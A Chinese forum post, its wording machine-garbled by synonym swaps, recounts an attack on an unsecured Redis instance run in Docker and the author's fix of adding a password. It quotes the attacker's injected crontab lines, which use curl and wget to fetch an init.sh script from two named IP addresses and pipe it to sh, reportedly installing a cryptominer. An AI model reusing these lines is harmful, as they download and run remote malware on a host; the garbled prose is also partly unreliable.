• 售前

  • 售后

热门帖子
入门百科

记一次Redis被攻击的办理方案

[复制链接]
123457297 显示全部楼层 发表于 2022-1-16 22:52:52 |阅读模式 打印 上一主题 下一主题
近期在开辟小步调配景时,发现redis内里的key偶尔会莫名奥妙地消散,而且是离逾期时间很远的key。本人起首是以为服务器内存不敷,然后查察了一下服务器内存。
  1. free -m
复制代码

发现剩余80M,着实照旧充足的。然后我就猜疑是不是redis设置了最大内存上限,起首打开redis的客户端,由于我是利用docker摆设的redis,以是利用了一下下令
  1. docker exec -it containerID redis-cli
复制代码
选择数据库

利用下面的下令查察内存设置
  1. <code>info memory
复制代码
得到下面的结果

此中used_memory体现已被利用的内存,此中下面的used_memory_human体现人性化的数据,体现用了1.68M内存,以是看出不是内存不敷的题目,然后我利用下面的指令查察汗青调用过的指令
  1. <code>info commandstats
复制代码

然后发现一个很震惊的变乱,flushall下令居然被调用了300次,然后我又打开aof文件查察

果然flushall被利用过,稳妥妥遭受攻击了。然后我又打开redis desktop,发现又四个莫名其妙的东西(backup1、backup2…)

点进去看,发现写有一些sh脚本,分别如下
  1. <code>*/2 * * * * root cd1 -fsSL http://195.58.38.171/cleanfda/init.sh | sh
  2. */3 * * * * root wget -q -O- http://195.58.38.171/cleanfda/init.sh | sh
  3. */4 * * * * root curl -fsSL http://195.242.111.238/cleanfda/init.sh | sh
  4. */5 * * * * root wd1 -q -O- http://195.242.111.238/cleanfda/init.sh | sh
复制代码
上网查了一下,通过这些脚本,攻击者会把redis看成矿机利用。
然后我想到的是立即为redis上暗码,起首我把redis容器给删了
  1. docker rm -f 容器id和容器名
复制代码
然后打开redis的设置文件,设置暗码,而且用下面的下令启动
  1. <code>docker run --name redis -v /root/redis/data:/data -v /root/redis/redis.conf:/usr/local/etc/redis.conf -p 6379:6379 -d redis redis-server
复制代码
打开redis客户端设置暗码
  1. <code>127.0.0.1:6379> config set requirepass zkcourse8346@
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作